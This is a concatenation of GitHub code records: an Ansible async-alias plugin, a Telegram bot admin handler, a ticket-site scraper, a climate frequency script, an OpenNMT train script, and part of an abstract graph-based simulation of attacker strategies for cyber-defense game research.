ActionModule(ActionBase):\n _VALID_ARGS = frozenset(['jid', 'job', 'alias'])\n\n def run(self, tmp=None, task_vars=None):\n results = super(ActionModule, self).run(tmp, task_vars)\n del tmp # tmp no longer has any effect\n\n if \"alias\" not in self._task.args:\n raise AnsibleError(\"job alias is required\")\n\n alias = self._task.args[\"alias\"]\n job = self._task.args.get(\"job\", \"\")\n jid = self._task.args.get(\"jid\", \"\")\n\n if not jid and not job:\n raise AnsibleError(\"jid or job is required\")\n\n if jid:\n results_file = os.path.join(self.async_dir(), jid)\n elif job:\n if job not in task_vars['vars']:\n raise AnsibleError(\"no job among facts\")\n else:\n job = task_vars['vars'][job]\n if \"results_file\" not in job:\n raise AnsibleError(\"job does not contain results file\")\n results_file = job['results_file']\n\n module_args = dict(\n src=results_file,\n dest=os.path.join(os.path.dirname(results_file), \"jid_\" + alias),\n state=\"link\"\n )\n status = self._execute_module(module_name='ansible.legacy.file', task_vars=task_vars,\n module_args=module_args)\n results = merge_hash(results, status)\n return results\n\n def async_dir(self):\n env_async_dir = [e for e in self._task.environment if\n \"ANSIBLE_ASYNC_DIR\" in e]\n if len(env_async_dir) > 0:\n # for backwards compatibility we need to get the dir from\n # ANSIBLE_ASYNC_DIR that is defined in the environment. This is\n # deprecated and will be removed in favour of shell options\n async_dir = env_async_dir[0]['ANSIBLE_ASYNC_DIR']\n\n msg = \"Setting the async dir from the environment keyword \" \\\n \"ANSIBLE_ASYNC_DIR is deprecated. Set the async_dir \" \\\n \"shell option instead\"\n self._display.deprecated(msg, \"2.12\", collection_name='ansible.builtin')\n else:\n # inject the async directory based on the shell option into the\n # module args\n async_dir = self.get_shell_option('async_dir', default=\"~/.ansible_async\")\n\n return async_dir","repo_name":"scylladb/scylla-ansible-roles","sub_path":"example-playbooks/async_extra/action_plugins/async_alias.py","file_name":"async_alias.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"} +{"seq_id":"41010737949","text":"import asyncio\nimport asyncpg\n\nfrom aiogram import types\nfrom aiogram.dispatcher import FSMContext\nfrom data.config import ADMINS\nfrom loader import dp, db, bot\nfrom keyboards.inline.container import container_key,ClearButton\nfrom states.admin_state import admin\nfrom aiogram.dispatcher.filters import Text\n\n#add picture command\n@dp.message_handler(commands=\"add_pic\", user_id=ADMINS)\nasync def send_ad_to_all(message: types.Message ,state:FSMContext):\n try:\n await message.answer('Kategoryani tanlang',reply_markup=container_key)\n await admin.select_container.set()\n except:\n await message.answer(\"Bir daqiqa kuting\")\n await message.answer('Kategoryani tanlang',reply_markup=container_key)\n\n@dp.message_handler(state=admin.select_container)\nasync def not_allowed(msg:types.Message):\n await msg.reply('Kategoriyani tanlashingiz kerak yoki,\\nBekor qilishnni bosing!!',reply_markup=container_key)\n\n#cancel commands\n@dp.callback_query_handler(text='cancel_add',state='*')\nasync def cancel_state(call: types.CallbackQuery, state: FSMContext):\n \"\"\"\n Allow user to cancel any action\n \"\"\"\n try:\n current_state = await state.get_state()\n if current_state is None:\n return\n\n # Cancel state and inform user about it\n await state.finish()\n # And remove keyboard (just in case)\n await call.answer('Bekor qilindi')\n await call.message.delete()\n await call.message.answer(\"Rasim qo'shish uchun /add_pic komandasini qayta yozing!\")\n\n except Exception as e:\n print(e)\n\n#wipe data\n\n@dp.message_handler(commands=\"clear_data\", user_id=ADMINS)\nasync def clear(message: types.Message ,state:FSMContext):\n await message.answer(text=\"Qaysi kategoriya malumotlarini o'chiray ?\",reply_markup=container_key)\n await state.set_state(admin.ClearData)\n\n\n#seleect dell container\n@dp.callback_query_handler(text='container1',state=admin.ClearData)\nasync def add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container1'\n }\n )\n await state.set_state(admin.ConfirmClear)\n\n@dp.callback_query_handler(text='container2',state=admin.ClearData)\nasync def add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container2'\n }\n )\n await state.set_state(admin.ConfirmClear)\n\n@dp.callback_query_handler(text='container3',state=admin.ClearData)\nasync def add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container3'\n }\n )\n await state.set_state(admin.ConfirmClear)\n\n@dp.callback_query_handler(text='container4',state=admin.ClearData)\nasync def add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container4'\n }\n )\n await state.set_state(admin.ConfirmClear)\n\n@dp.callback_query_handler(text='container5',state=admin.ClearData)\nasync def add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container5'\n }\n )\n await state.set_state(admin.ConfirmClear)\n\n@dp.callback_query_handler(text='container6',state=admin.ClearData)\nasync def add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container6'\n }\n )\n await state.set_state(admin.ConfirmClear)\n\n@dp.callback_query_handler(text='container7',state=admin.ClearData)\nasync def add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container7'\n }\n )\n await state.set_state(admin.ConfirmClear)\n\n@dp.callback_query_handler(text='container8',state=admin.ClearData)\nasync def add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container8'\n }\n )\n await state.set_state(admin.ConfirmClear)\n\n@dp.callback_query_handler(text='container9',state=admin.ClearData)\nasync def add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container9'\n }\n )\n await state.set_state(admin.ConfirmClear)\n \n#cleared\n@dp.callback_query_handler(text='clear_confirm',state=admin.ConfirmClear,user_id=ADMINS)\nasync def clear(call:types.CallbackQuery,state:FSMContext):\n data=await state.get_data()\n try:\n try:\n if data.get('action')=='container1':\n await db.drop_capture1()\n if data.get('action')=='container2':\n await db.drop_capture2()\n if data.get('action')=='container3':\n await db.drop_capture3()\n if data.get('action')=='container4':\n await db.drop_capture4()\n if data.get('action')=='container5':\n await db.drop_capture5()\n if data.get('action')=='container6':\n await db.drop_capture6()\n if data.get('action')=='container7':\n await db.drop_capture7()\n if data.get('action')=='container8':\n await db.drop_capture8()\n if data.get('action')=='container9':\n await db.drop_capture9()\n await call.answer(\"🗑 Malumotlar tozalandi\")\n await call.message.delete()\n await state.reset_state()\n except asyncpg.exceptions.ConnectionDoesNotExistError:\n await call.message.answer(\"Ulanishda xatolik /clear_data ni qayta yuboring!!\")\n await asyncio.sleep(60)\n await state.reset_state()\n except asyncpg.exceptions.UndefinedTableError:\n await call.answer(\"Malumot topilmadi!!\")\n await call.message.delete()\n await state.reset_state()\n\n#cancell confirm\n@dp.callback_query_handler(text='cancel',state=admin.ConfirmClear,user_id=ADMINS)\nasync def clear(call:types.CallbackQuery,state:FSMContext):\n await call.answer('Bekor qilindi!!')\n await call.message.answer(\"Malumot uchun: /help \")\n await call.message.delete()\n await state.reset_state()\n","repo_name":"SanjarbekDev/SabinaMebel","sub_path":"handlers/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":7026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10870560386","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\nfrom fake_useragent import UserAgent\nfrom time import sleep\n\n# 定义请求头\nHEADERS = {\n 'User-Agent': UserAgent().random,\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',\n 'Accept-Encoding': 'gzip,deflate,br',\n 'Cookie': '',\n 'Connection': 'keep-alive',\n 'Pragma': 'no-cache',\n 'Cache-Control': 'no-cache'\n}\n\n# 新建写入的csv\ncsvfile = open('qunar.csv', 'w', encoding='utf-8', newline='')\nwriter = csv.writer(csvfile)\n# 写入第一行\nwriter.writerow([\"区域\", \"名称\", \"景点id\", \"类型\", \"级别\", \"热度\", \"地址\", \"特色\", \"经纬度\"])\n\n\n# 下载景点内容的函数\npageCount = 0\nMAX_PAGE_COUNT = 10 # 增加一个最大页数的限制\n\n# 下载页面,如果状态码不为200,等待10s\ndef download_soup_waitting(url):\n try:\n # verify 传入Charles的根证书,该证书从Keychain中导出,用于抓取https包\n response = requests.get(url, headers=HEADERS, allow_redirects=False, timeout=5, verify='/Users/vinzhou/Documents/CharlesProxyCA.pem')\n if response.status_code == 200:\n html = response.content\n html = html.decode(\"utf-8\")\n soup = BeautifulSoup(html, \"html.parser\")\n print(\"下载完成: \"+url)\n return soup\n else:\n sleep(10)\n print(\"等待下载中: \"+url)\n return download_soup_waitting(url)\n except:\n return \"\"\n\n\ndef get_types():\n # 定义热门景点的类型\n types = [\"文化古迹\", \"自然风光\", \"公园\", \"古建筑\", \"寺庙\", \"遗迹\", \"古镇\", \"陵墓陵园\", \"故居\", \"宗教\"]\n for type in types:\n global pageCount\n pageCount = 0\n # 定义请求的url字符串,%E7%83%AD%E9%97%A8%E6%99%AF%E7%82%B9 为 热门景点 的url encoding值\n url = \"https://piao.qunar.com/ticket/list.htm?keyword=%E7%83%AD%E9%97%A8%E6%99%AF%E7%82%B9&from=mpl_search_suggest&subject=\" + type + \"&page=1\"\n get_type(type, url)\n\n\ndef get_type(type, url):\n soup = download_soup_waitting(url)\n if soup == \"\":\n print(\"soup is empty\")\n return\n search_list = soup.find('div', attrs={'id': 'search-list'})\n sight_items = search_list.findAll('div', attrs={'class': 'sight_item'})\n for sight_item in sight_items:\n name = sight_item['data-sight-name']\n districts = sight_item['data-districts']\n point = sight_item['data-point']\n address = sight_item['data-address']\n data_id = sight_item['data-id']\n level = sight_item.find('span', attrs={'class': 'level'}) # 5A\n if level:\n level = level.text\n else:\n level = \"\"\n product_star_level = sight_item.find('span', attrs={'class': 'product_star_level'})\n if product_star_level:\n product_star_level = product_star_level.text\n else:\n product_star_level = \"\"\n intro = sight_item.find('div', attrs={'class': 'intro'})\n if intro:\n intro = intro['title']\n else:\n intro = \"\"\n writer.writerow(\n [districts.replace(\"\\n\", \"\"), name.replace(\"\\n\", \"\"), data_id.replace(\"\\n\", \"\"), type.replace(\"\\n\", \"\"),\n level.replace(\"\\n\", \"\"), product_star_level.replace(\"\\n\", \"\"), address.replace(\"\\n\", \"\"),\n intro.replace(\"\\n\", \"\"), point.replace(\"\\n\", \"\")])\n # 找到向下翻页的按钮\n next = soup.find('a', attrs={'class': 'next'})\n global pageCount\n if next and pageCount < MAX_PAGE_COUNT:\n pageCount += 1\n next_url = \"http://piao.qunar.com\" + next['href']\n get_type(type, next_url)\n\n\nif __name__ == '__main__':\n get_types()\n","repo_name":"vin-zhou/CrawlerPlay","sub_path":"GraspData.py","file_name":"GraspData.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29550361544","text":"import sys\nsys.path.append('./')\nfrom base import *\n\n# df must include 'amount' column\ndef create_frequency_table(df, column):\n df['quantile'] = pd.qcut(df[column],q=10,precision=0)\n df['quantile_no'] = pd.qcut(df[column],q=10,labels=False,precision=0)\n frequency = pd.crosstab(index=df['amount'], columns=df['quantile']) \n return frequency\n\n\ndef create_relative_frequency_table(df):\n ndf = df.copy()\n ndf.columns = [0,1,2,3,4,5,6,7,8,9]\n ndf['0rf'] = ndf.apply(lambda row: row[0]/(ndf[0].sum()), axis = 1) \n ndf['1rf'] = ndf.apply(lambda row: row[1]/(ndf[1].sum()), axis = 1) \n ndf['2rf'] = ndf.apply(lambda row: row[2]/(ndf[2].sum()), axis = 1) \n ndf['3rf'] = ndf.apply(lambda row: row[3]/(ndf[3].sum()), axis = 1) \n ndf['4rf'] = ndf.apply(lambda row: row[4]/(ndf[4].sum()), axis = 1) \n ndf['5rf'] = ndf.apply(lambda row: row[5]/(ndf[5].sum()), axis = 1) \n ndf['6rf'] = ndf.apply(lambda row: row[6]/(ndf[6].sum()), axis = 1) \n ndf['7rf'] = ndf.apply(lambda row: row[7]/(ndf[7].sum()), axis = 1) \n ndf['8rf'] = ndf.apply(lambda row: row[8]/(ndf[8].sum()), axis = 1) \n ndf['9rf'] = ndf.apply(lambda row: row[9]/(ndf[9].sum()), axis = 1) \n\n relFre = ndf[['0rf','1rf','2rf','3rf','4rf','5rf','6rf','7rf','8rf','9rf']].copy()\n\n return relFre\n\n\nCSVFilename = './measured-climate-data/measured-with-observed-only.csv' ### <<<<< Change this file when needed\ndata = pd.read_csv(CSVFilename, index_col=False)\ndf = data[['date','PET','amount']]\n\n# create frequency table\nfre = create_frequency_table(df, 'PET')\n# fre.to_csv('for-modeling/freqency.csv')\n\nrelFre = create_relative_frequency_table(fre)\n# relFre.to_csv('for-modeling/relative-freqency.csv')\n\ncum = relFre.cumsum()\ncum.columns = ['0','1','2','3','4','5','6','7','8','9']\ncum.to_csv('for-modeling/cumulative-freqency.csv')\n\n","repo_name":"monumentalconservation/climate-analysis","sub_path":"modelling-scripts/createFrequencyTable.py","file_name":"createFrequencyTable.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37426953174","text":"#!/usr/bin/env python\n\"\"\"\n Main training workflow\n\"\"\"\n\nimport configargparse\nimport os\nimport signal\n\nimport onmt.opts as opts\nfrom onmt.train_single import main as single_main\n\n\ndef main(opt):\n\n if opt.gpu: # case GPU\n single_main(opt, 0)\n else: # case only CPU\n single_main(opt, -1)\n\nclass ErrorHandler(object):\n \"\"\"A class that listens for exceptions in children processes and propagates\n the tracebacks to the parent process.\"\"\"\n\n def __init__(self, error_queue):\n \"\"\" init error handler \"\"\"\n import signal\n import threading\n self.error_queue = error_queue\n self.children_pids = []\n self.error_thread = threading.Thread(\n target=self.error_listener, daemon=True)\n self.error_thread.start()\n signal.signal(signal.SIGUSR1, self.signal_handler)\n\n def add_child(self, pid):\n \"\"\" error handler \"\"\"\n self.children_pids.append(pid)\n\n def error_listener(self):\n \"\"\" error listener \"\"\"\n (rank, original_trace) = self.error_queue.get()\n self.error_queue.put((rank, original_trace))\n os.kill(os.getpid(), signal.SIGUSR1)\n\n def signal_handler(self, signalnum, stackframe):\n \"\"\" signal handler \"\"\"\n for pid in self.children_pids:\n os.kill(pid, signal.SIGINT) # kill children processes\n (rank, original_trace) = self.error_queue.get()\n msg = \"\"\"\\n\\n-- Tracebacks above this line can probably be ignored --\\n\\n\"\"\"\n msg += original_trace\n raise Exception(msg)\n\n\nif __name__ == \"__main__\":\n parser = configargparse.ArgumentParser(\n description='train.py',\n config_file_parser_class=configargparse.YAMLConfigFileParser,\n formatter_class=configargparse.ArgumentDefaultsHelpFormatter)\n\n opts.config_opts(parser)\n opts.add_md_help_argument(parser)\n opts.model_opts(parser)\n opts.train_opts(parser)\n\n opt = parser.parse_args()\n main(opt)\n","repo_name":"Plutone11011/CoRec","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34841435414","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[34]:\n\n\nimport random\nimport numpy as np\nfrom main import display\nfrom defender_function import *\nimport numpy as np\nimport random\nimport math\nimport copy\nimport graph_function\n\n\n# In[ ]:\n\n\n\n\n\n# In[35]:\n\n\ndef att_strategy_option_matrix(CKC_number, strategy_number):\n strat_option = np.zeros((CKC_number, strategy_number))\n # R\n strat_option[0, 0] = 1\n # D\n strat_option[1, 0] = 1\n strat_option[1, 1] = 1\n # E\n strat_option[2, 1] = 1\n strat_option[2, 2] = 1\n strat_option[2, 3] = 1\n strat_option[2, 4] = 1\n strat_option[2, 6] = 1\n # C2\n for i in range(strategy_number - 1):\n strat_option[3, i] = 1\n # M\n for i in range(strategy_number - 1):\n strat_option[4, i] = 1\n # DE\n for i in range(strategy_number):\n strat_option[5, i] = 1\n \n return strat_option\n\n\n# In[36]:\n\n\ndef att_strategy_cost(strategy_number):\n# preset cost\n attack_cost = np.zeros(strategy_number)\n attack_cost[0] = 1\n attack_cost[1] = 3\n attack_cost[2] = 3\n attack_cost[3] = 3\n attack_cost[4] = 1\n attack_cost[5] = 3\n attack_cost[6] = 2\n attack_cost[7] = 3\n \n return attack_cost\n\n\n# In[37]:\n\n\ndef update_strategy_probability(opponent_strat_history):\n return_result = np.zeros((len(opponent_strat_history), len(opponent_strat_history[0])))\n sum_botton = np.sum(opponent_strat_history, axis=1)\n for k in range(len(opponent_strat_history)):\n for j in range(len(opponent_strat_history[0])):\n if sum_botton[k] == 0:\n return_result[k][j] = 1/len(opponent_strat_history[0])\n else:\n return_result[k][j] = opponent_strat_history[k][j]/sum_botton[k]\n \n return return_result\n \n \n\n\n# In[38]:\n\n\ndef attacker_uncertainty_update(att_in_system_time, att_detect, dec, uncertain_scheme, _lambda):\n # _lambda = 0.8 # was 2\n\n df = 1 + (1-att_detect) * dec\n uncertainty = 1 - math.exp((-_lambda) * (df)/att_in_system_time)\n \n# (scheme change here!) \n if uncertain_scheme:\n return uncertainty\n else:\n return 0\n\n\n# In[39]:\n\n\n# APV: value of an intermediate node i in an attack path\ndef calc_APV(G_att, G_real, node_ID, attack_cost, attack_detect_prob):\n \n if G_att.nodes[node_ID][\"compromised_status\"]:\n return 1\n \n att_detect_honey = False\n if G_real.nodes[node_ID][\"honeypot\"] == 1:\n if random.random() < attack_detect_prob:\n att_detect_honey = True\n elif G_real.nodes[node_ID][\"honeypot\"] == 2:\n if random.random() < (attack_detect_prob/2):\n att_detect_honey = True\n if att_detect_honey:\n# return (1 - (attack_cost/3) ) * G_real.nodes[node_ID][\"normalized_vulnerability\"]\n # if the node is honeypot, the APV for honeypot is 0.\n return 0\n else:\n return (1 - (attack_cost/3) ) * G_att.nodes[node_ID][\"normalized_vulnerability\"]\n\n \n\n\n# In[40]:\n\n\n# Attack Impact by given attack k\n# new_compromised_list is new compromised node IDs (do not include already compromised node)\ndef attack_impact(G, new_compromised_list):\n \n if len(new_compromised_list) == 0:\n return 0\n \n N = G.number_of_nodes()\n \n total_criticality = 0\n for n in new_compromised_list:\n total_criticality += G.nodes[n][\"criticality\"]\n ai = total_criticality/N\n return ai\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[41]:\n\n\n# AS1 – Monitoring attack\n# (keep try untile get one)\n# return: a dictionary contain all information\ndef attack_AS_1(G_real, G_att, G_def, node_info_list, monit_time):\n\n attack_cost = 1\n attack_result = {\"attack_cost\": attack_cost, \"ids\": []}\n \n node_id_set = list(G_att.nodes())\n\n # if all node evicted, do nothing\n# if all(list(nx.get_node_attributes(G_real, \"evicted_mark\").values())):\n# print(\"AS_1 Fail\")\n# return attack_result\n \n\n not_get_one = True\n while not_get_one:\n random_id = random.choice(node_id_set)\n # Check if compromised\n if not G_real.nodes[random_id][\"evicted_mark\"]:\n not_get_one = False\n if random.random() <= G_real.nodes[random_id][\n \"normalized_vulnerability\"] * math.exp(-1/monit_time): # success rate is based on real graph\n node_info_list.append(G_att.nodes[random_id][\"id\"])\n# not_get_one = False\n \n return attack_result\n\n\n# In[1]:\n\n\n# AS2 – Social engineering\n# input: node_info_list: nodes with information collected (dictionary type)\n#\n# return: a dictionary with \"attack cost\", and compromised \"ids\". \"ids\" is empty if unsuccessful\n\n# TODO: check all attack strategy, if correct vulnerability type is used\ndef attack_AS_2(node_info_list, G_real, G_att, G_def, P_fake,\n attack_detect_prob, location):\n \n attack_cost = 3\n\n attack_result = {\"attack_cost\": attack_cost, \"ids\": []}\n\n # fake key probability\n if random.random() <= P_fake:\n if display:\n print(\"get fake key, failed to compromise\")\n return attack_result\n\n # if outside\n if location is None:\n if node_info_list:\n target_node_id = random.choice(node_info_list)\n if random.random(\n ) < G_real.nodes[target_node_id][\"normalized_vulnerability\"]:\n attack_result[\"ids\"].append(target_node_id)\n G_real.nodes[target_node_id][\"compromised_status\"] = True\n G_att.nodes[target_node_id][\"compromised_status\"] = True\n# G_def.nodes[target_node_id][\"compromised_status\"] = True\n return attack_result\n\n # if inside\n max_APV_id = None\n max_APV = 0\n att_neighbors = [n for n in G_att[location]]\n\n # decide which node to compromise\n for node_id in att_neighbors:\n if G_real.has_node(node_id):\n if calc_APV(G_att, G_real, G_att.nodes[node_id][\"id\"], attack_cost,\n attack_detect_prob) >= max_APV: # choose node with APV\n max_APV = calc_APV(G_att, G_real, G_att.nodes[node_id][\"id\"],\n attack_cost, attack_detect_prob)\n max_APV_id = G_att.nodes[node_id][\"id\"]\n\n if max_APV_id is None:\n if display:\n print(\"no legitimate node in collection list \\U0001F630\")\n return attack_result\n\n # collusive attack\n if G_att.nodes[max_APV_id][\"compromised_status\"] and G_real.nodes[\n max_APV_id][\"compromised_status\"]:\n attack_result[\"ids\"].append(max_APV_id)\n if display: print(\"AS2: collusive attack\")\n return attack_result\n\n # compromise attempt\n if random.random() < G_real.nodes[max_APV_id][\"normalized_vulnerability\"]:\n attack_result[\"ids\"].append(max_APV_id)\n # set it compromised\n G_real.nodes[max_APV_id][\"compromised_status\"] = True\n G_att.nodes[max_APV_id][\"compromised_status\"] = True\n# G_def.nodes[max_APV_id][\"compromised_status\"] = True\n else:\n if display:\n print(\"AS2: unsuccessful on\", max_APV_id, \"with vul\",\n G_real.nodes[max_APV_id][\"normalized_vulnerability\"])\n\n return attack_result\n\n\n# In[43]:\n\n\n# AS3 – Botnet-based attack\n# (a legitimate node with more than one compromised node will be tried more than one times)\n# return: attack_result[\"ids\"] is new compromised ids\n\n\ndef attack_AS_3(collection_list, G_real, G_att, G_def, P_fake,\n attack_detect_prob):\n\n attack_result = {\"attack_cost\": 3, \"ids\": []}\n\n if random.random() <= P_fake:\n if display:\n print(\"get fake key, failed to compromise\")\n return attack_result\n\n\n# compromised_nodes = []\n# for n in G_att.nodes():\n# if G_real.nodes[n][\"compromised_status\"]:\n# compromised_nodes.append(n)\n attacked_adjacent = []\n\n # all_nodes = list(G_real.nodes())\n for node_id in collection_list:\n if not G_real.nodes[node_id][\"evicted_mark\"]:\n # if attacker detect deception, use real network\n if random.random() < attack_detect_prob:\n attacked_adjacent += graph_function.adjacent_node(G_real, node_id)\n else:\n attacked_adjacent += graph_function.adjacent_node(G_att, node_id)\n\n attacked_adjacent = list(set(attacked_adjacent))\n\n for n in attacked_adjacent:\n if G_att.nodes[n][\"compromised_status\"] and G_real.nodes[n][\n \"compromised_status\"]:\n # collusive attack\n attack_result[\"ids\"].append(n)\n else:\n if random.random() <= G_real.nodes[n][\"normalized_vulnerability\"]:\n G_real.nodes[n][\"compromised_status\"] = True\n G_att.nodes[n][\"compromised_status\"] = True\n# G_def.nodes[n][\"compromised_status\"] = True\n attack_result[\"ids\"].append(n)\n\n return attack_result\n\n\n# In[44]:\n\n\n# AS4 – Distributed Denial-of-Service (DDoS)\n# return: attack_result[\"ids\"] is the node that Unknow Vulnerability(UV) increased\n\n\ndef attack_AS_4(G_real, G_att, G_def, attack_detect_prob, P_fake, attacker_locaton):\n\n attack_cost = 3\n attack_result = {\"attack_cost\": attack_cost, \"ids\": []}\n\n if random.random() < attack_detect_prob:\n attacker_adjacent = graph_function.adjacent_node(G_real, attacker_locaton)\n else:\n attacker_adjacent = graph_function.adjacent_node(G_att, attacker_locaton)\n \n max_APV_id = None\n max_APV = 0\n\n # perform DDoS\n for node_id in attacker_adjacent:\n if G_real.has_node(node_id):\n G_real.nodes[node_id][\"unknown vulnerability\"][0] = min(\n G_real.nodes[node_id][\"unknown vulnerability\"][0] * 1.1, 10)\n G_att.nodes[node_id][\"unknown vulnerability\"][0] = min(\n G_att.nodes[node_id][\"unknown vulnerability\"][0] * 1.1, 10)\n G_def.nodes[node_id][\"unknown vulnerability\"][0] = min(\n G_def.nodes[node_id][\"unknown vulnerability\"][0] * 1.1, 10)\n\n # update nodes attribute\n graph_function.update_vul(G_real)\n graph_function.update_vul(G_att)\n graph_function.update_vul(G_def)\n \n if random.random() <= P_fake:\n if display:\n print(\"get fake key, failed to compromise\")\n return attack_result\n\n # decide which node to compromise\n for node_id in attacker_adjacent:\n if G_att.has_node(node_id):\n if calc_APV(G_att, G_real, G_att.nodes[node_id][\"id\"], attack_cost,\n attack_detect_prob) >= max_APV: # choose node with APV\n max_APV = calc_APV(G_att, G_real, G_att.nodes[node_id][\"id\"],\n attack_cost, attack_detect_prob)\n max_APV_id = G_att.nodes[node_id][\"id\"]\n\n if max_APV_id is None:\n if display:\n print(\"attacker have no legitimate adjacent node \\U0001F630\")\n return attack_result\n \n # collusive attack\n if G_att.nodes[max_APV_id][\"compromised_status\"] and G_real.nodes[\n max_APV_id][\"compromised_status\"]:\n attack_result[\"ids\"].append(max_APV_id)\n if display: print(\"AS4: collusive attack\")\n return attack_result\n\n # compromise attempt\n if random.random() < G_real.nodes[max_APV_id][\"normalized_vulnerability\"]:\n attack_result[\"ids\"].append(max_APV_id)\n # set it compromised\n G_real.nodes[max_APV_id][\"compromised_status\"] = True\n G_att.nodes[max_APV_id][\"compromised_status\"] = True\n# G_def.nodes[max_APV_id][\"compromised_status\"] = True\n else:\n if display:\n print(\"AS4: unsuccessful on\", max_APV_id, \"with vul\",\n G_real.nodes[max_APV_id][\"normalized_vulnerability\"])\n \n return attack_result\n\n\n\n# In[45]:\n\n\n# AS5 – Zero-day attacks\ndef attack_AS_5(G_real, G_att, G_def, attacker_locaton, attack_detect_prob):\n \n attack_cost = 1\n \n if random.random() < attack_detect_prob:\n attacked_adjacent = graph_function.adjacent_node(G_real, attacker_locaton)\n else:\n attacked_adjacent = graph_function.adjacent_node(G_att, attacker_locaton)\n\n attack_result = {\"attack_cost\": attack_cost, \"ids\": []}\n\n\n max_APV_id = None\n max_APV = 0\n # decide which node to compromise\n for n in attacked_adjacent:\n if calc_APV(G_att, G_real, n, attack_cost, attack_detect_prob) >= max_APV:\n max_APV_id = n\n max_APV = calc_APV(G_att, G_real, n, attack_cost, attack_detect_prob)\n\n if max_APV_id is None:\n if display:\n print(\"no legitimate neighbor node \\U0001F630\")\n return attack_result\n \n # collusive attack\n if G_att.nodes[max_APV_id][\"compromised_status\"] and G_real.nodes[\n max_APV_id][\"compromised_status\"]:\n attack_result[\"ids\"].append(max_APV_id)\n if display: print(\"AS5: collusive attack\")\n return attack_result\n \n # try compromising\n # if random.uniform(0, 10) <= G_real.nodes[max_APV_id][\"normalized_vulnerability\"]:\n if random.uniform(0, 10) <= G_real.nodes[max_APV_id][\"unknown vulnerability\"][0]:\n G_real.nodes[max_APV_id][\"compromised_status\"] = True\n G_att.nodes[max_APV_id][\"compromised_status\"] = True\n# G_def.nodes[max_APV_id][\"compromised_status\"] = True\n attack_result[\"ids\"].append(max_APV_id)\n \n return attack_result\n\n\n# In[46]:\n\n\n# AS6 – Breaking encryption\n\n\ndef attack_AS_6(G_real, G_att, G_def, attacker_locaton, P_fake,\n attack_detect_prob):\n\n attack_cost = 3\n attack_result = {\"attack_cost\": attack_cost, \"ids\": []}\n\n if random.random() <= P_fake:\n if display:\n print(\"get fake key, failed to compromise\")\n return attack_result\n\n if random.random() < attack_detect_prob:\n attacked_adjacent = graph_function.adjacent_node(G_real, attacker_locaton)\n else:\n attacked_adjacent = graph_function.adjacent_node(G_att, attacker_locaton)\n\n # decide which node to compromise\n max_APV_id = None\n max_APV = 0\n for n in attacked_adjacent:\n if calc_APV(G_att, G_real, n, attack_cost,\n attack_detect_prob) >= max_APV:\n max_APV_id = n\n max_APV = calc_APV(G_att, G_real, n, attack_cost,\n attack_detect_prob)\n\n if max_APV_id is None:\n if display:\n print(\"no legitimate neighbor node \\U0001F630\")\n return attack_result\n\n # collusive attack\n if G_att.nodes[max_APV_id][\"compromised_status\"] and G_real.nodes[\n max_APV_id][\"compromised_status\"]:\n attack_result[\"ids\"].append(max_APV_id)\n if display: print(\"AS6: collusive attack\")\n return attack_result\n\n # compromise attempt\n if random.random() <= sum(\n G_real.nodes[max_APV_id][\"encryption vulnerability\"]) / len(\n G_real.nodes[max_APV_id][\"encryption vulnerability\"]):\n G_real.nodes[max_APV_id][\"compromised_status\"] = True\n G_att.nodes[max_APV_id][\"compromised_status\"] = True\n # G_def.nodes[max_APV_id][\"compromised_status\"] = True\n attack_result[\"ids\"].append(max_APV_id)\n else:\n if display:\n print(\"AS6: unsuccessful on\", max_APV_id, \"with APV\", max_APV)\n\n return attack_result\n\n\n# In[47]:\n\n\n# AS7 – Fake identity\ndef attack_AS_7(G_real, G_att, G_def, attacker_locaton, P_fake,\n attack_detect_prob):\n\n attack_cost = 2\n attack_result = {\"attack_cost\": attack_cost, \"ids\": []}\n\n # Increase EV\n if random.random() < attack_detect_prob:\n attacker_adjacent = graph_function.adjacent_node(G_real, attacker_locaton)\n else:\n attacker_adjacent = 